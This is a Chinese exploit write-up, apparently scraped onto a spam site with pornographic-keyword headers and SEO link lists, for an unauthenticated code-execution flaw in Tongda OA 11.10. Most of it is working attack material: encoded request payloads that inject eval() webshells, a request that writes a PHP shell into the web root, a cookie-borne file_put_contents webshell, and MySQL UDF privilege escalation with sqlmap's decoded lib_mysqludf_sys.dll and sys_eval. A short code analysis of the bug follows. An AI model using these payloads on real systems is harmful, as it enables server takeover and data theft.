中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

重慶網(wǎng)站建設(shè)重慶網(wǎng)站設(shè)計免費入駐的賣貨平臺有哪些

重慶網(wǎng)站建設(shè)重慶網(wǎng)站設(shè)計,免費入駐的賣貨平臺有哪些,如何判斷網(wǎng)站是用織夢做的,怎樣做汽車網(wǎng)站建設(shè)漏洞簡介 之前也對通達(dá) oa 做過比較具體的分析和漏洞挖掘,前幾天看到通達(dá) oa 11.10 存在未授權(quán)任意文件上傳漏洞,于是也打算對此進(jìn)行復(fù)現(xiàn)和分析。 環(huán)境搭建 https://www.tongda2000.com/download/p2019.php 下載地址 :https://cdndown.tongda…

漏洞簡介

之前也對通達(dá) oa 做過比較具體的分析和漏洞挖掘,前幾天看到通達(dá) oa 11.10 存在未授權(quán)任意文件上傳漏洞,于是也打算對此進(jìn)行復(fù)現(xiàn)和分析。

環(huán)境搭建

https://www.tongda2000.com/download/p2019.php

下載地址 :https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe

995a70dbca3274e813fb25dfd40e5852.png

查看版本信息

4456f6e23ae634f3dda002018e7f755c.png

漏洞復(fù)現(xiàn)

利用方式一

http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
98f918a36fe1d9bf0273a25a0f9a2a87.png

利用方式二

無法直接寫入帶有變量的 php 文件

所以首先利用 無參 webshell

<?php?@eval(next(getallheaders()));
a530dc1c7c2942c622a15ec3a2b4dc30.png
GET?/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage?HTTP/1.1
Host:?192.168.222.128
Upgrade-Insecure-Requests:?1
User-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/85.0.4183.83?Safari/537.36
Accept:?text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:?gzip,?deflate
Accept-Language:?zh-CN,zh;q=0.9
Connection:?close
9e03e56364be72fabcc59bd5f2de4648.png

上傳成功后再利用第一次生成的惡意文件再生成文件

GET?/general/test.php?HTTP/1.1
Host:?192.168.121.147:8081
User-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/103.0.0.0?Safari/537.36
Accept:?text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:?zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:?gzip,?deflate
Connection:?close
Cookie:?file_put_contents('test1.php','<?php?@eval($_REQUEST[1]);');
Content-Length:?28Upgrade-Insecure-Requests:?1
923cffd7cd73a345572ccc582d4290dd.png 8d939416a6823ec1e2cfb1be5ec6cb5c.png

但是無法直接直接命令,這是因為權(quán)限過低的原因 所以想要進(jìn)一步的操作,就需要提權(quán)

8b1cce2ab7a45a97f4e74ae93ce2a4ba.png

通過查看配置文件看到 mysql 數(shù)據(jù)庫的密碼

71de485a2b4da153e230737bb9f7b348.png

利用蟻劍連接數(shù)據(jù)庫

d4322f81a42a6b307327f57072a7c88d.png

查看 mysql 的版本

Mysql版本提權(quán)dll存放位置
>5.1mysql根路徑(select @@basedir)下/lib/plugin/
<5.1系統(tǒng)目錄c:\windows\system32下

SqlMap 中集成了對應(yīng)的提權(quán)文件,不過需要先進(jìn)行解密操作

udf.dll的是經(jīng)過編碼運算的,所以需要有一個解密腳本,在這個路徑下

sqlmap-master\extra\cloak

對應(yīng)的 dll 文件路徑

sqlmap-master\data\udf\mysql\windows\64

執(zhí)行解碼操作

cloak.py -d -i sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

然后將解碼好的文件上傳到 mysql/lib/plugin/ 路徑下

5863c3a2679d39e5c4c740e5bfe914c2.png
create?function?sys_eval?returns?string?soname?'lib_mysqludf_sys.dll';
select?sys_eval("whoami");
89f75529ed82f5a00c7c3345dc7a9027.png

漏洞分析

general\appbuilder\modules\portal\controllers\GatewayController.php#actionGetdata

c4c5c5cc484c1d4c2b76677ccb491b4e.png

首先判斷是否存在參數(shù) id 之后根據(jù) module 的值依次執(zhí)行 GetData與toUTF8方法

general\appbuilder\modules\portal\models\PortalComponent.php#GetData

4ac8d2393dda4b331dac850008051037.png

根據(jù) id 查詢,返回相對對應(yīng)的數(shù)值 $activeTab 的值是從外部獲取的

根據(jù)不同的 $module 調(diào)用不同的get_data 方法

general\appbuilder\modules\portal\components\AppDesignComponents.php#data_analysis

61f4faa7418ad52dab898c98a1a30555.png

general\appbuilder\modules\appdesign\models\AppUtils.php#toUTF8

354b5fe321f24100b441f1b73f45287a.png

這里有一點類似于寬字節(jié)注入,利用類型的轉(zhuǎn)換,使得傳入的單引號轉(zhuǎn)移后又被編碼轉(zhuǎn)換成漢字,最終使得單引號逃逸出來。最后實現(xiàn)命令執(zhí)行。

原創(chuàng)稿件征集

征集原創(chuàng)技術(shù)文章中,歡迎投遞

投稿郵箱:edu@antvsion.com

文章類型:黑客極客技術(shù)、信息安全熱點安全研究分析等安全相關(guān)

通過審核并發(fā)布能收獲200-800元不等的稿酬。

更多詳情,點我查看!

3d76afb3ddafda2c3772f20b47f2beef.gif

靶場實操,戳“閱讀原文“

http://www.risenshineclean.com/news/62545.html

相關(guān)文章:

  • 創(chuàng)新模式_提高質(zhì)量_建設(shè)一流的數(shù)學(xué)人才培養(yǎng)基地 教學(xué)成果獎申報網(wǎng)站詳細(xì)描述如何進(jìn)行搜索引擎的優(yōu)化
  • 做網(wǎng)站只有域名哪個網(wǎng)站百度收錄快
  • 骨科醫(yī)院網(wǎng)站優(yōu)化服務(wù)商seo網(wǎng)絡(luò)推廣公司報價
  • 多語種網(wǎng)站營銷溫州seo服務(wù)
  • 做網(wǎng)站商城怎么樣國產(chǎn)長尾關(guān)鍵詞拘挖掘
  • 做網(wǎng)站銷售iis搭建網(wǎng)站
  • 找人做網(wǎng)站 優(yōu)幫云百度電話銷售
  • wordpress 微網(wǎng)站模板百度搜索平臺
  • wordpress網(wǎng)站插件軟文營銷的概念
  • 平面設(shè)計有什么網(wǎng)站360推廣
  • wordpress怎么改變文章的域名網(wǎng)站推廣的優(yōu)化
  • 無錫做網(wǎng)站費用北京百度推廣代理
  • app大全軟件網(wǎng)站免費下載域名解析網(wǎng)站
  • 深圳建網(wǎng)站好的公司好用的視頻播放器app
  • 惠州外貿(mào)網(wǎng)站建設(shè)北京seo排名技術(shù)
  • 開發(fā)區(qū)招聘網(wǎng)最新招聘百度上海推廣優(yōu)化公司
  • 南充網(wǎng)站制作他達(dá)那非副作用太強(qiáng)了
  • 怎樣進(jìn)行網(wǎng)站開發(fā)網(wǎng)絡(luò)公司關(guān)鍵詞排名
  • 網(wǎng)站搜索引擎優(yōu)化的內(nèi)容谷歌chrome瀏覽器官方下載
  • 軟件外包多少錢seo培訓(xùn)班
  • 最專業(yè)的網(wǎng)站建設(shè)公司杭州哪家seo公司好
  • 網(wǎng)站的作用和意義百度地圖導(dǎo)航
  • 做網(wǎng)站如何分類產(chǎn)品網(wǎng)絡(luò)推廣免費網(wǎng)站
  • 永泰城鄉(xiāng)建設(shè)網(wǎng)站網(wǎng)絡(luò)營銷專業(yè)是干什么的
  • 做腳本的網(wǎng)站新聞熱點最新事件
  • 服務(wù)器與網(wǎng)站百度排名工具
  • 義烏網(wǎng)站建設(shè)制作商品牌策劃方案ppt
  • 網(wǎng)站建設(shè)服務(wù)合同需要哪些資料seo搜索引擎營銷工具
  • led燈籠河網(wǎng)站建設(shè)搜索引擎優(yōu)化員簡歷
  • 萬維網(wǎng)申請網(wǎng)站域名搜狗站長工具平臺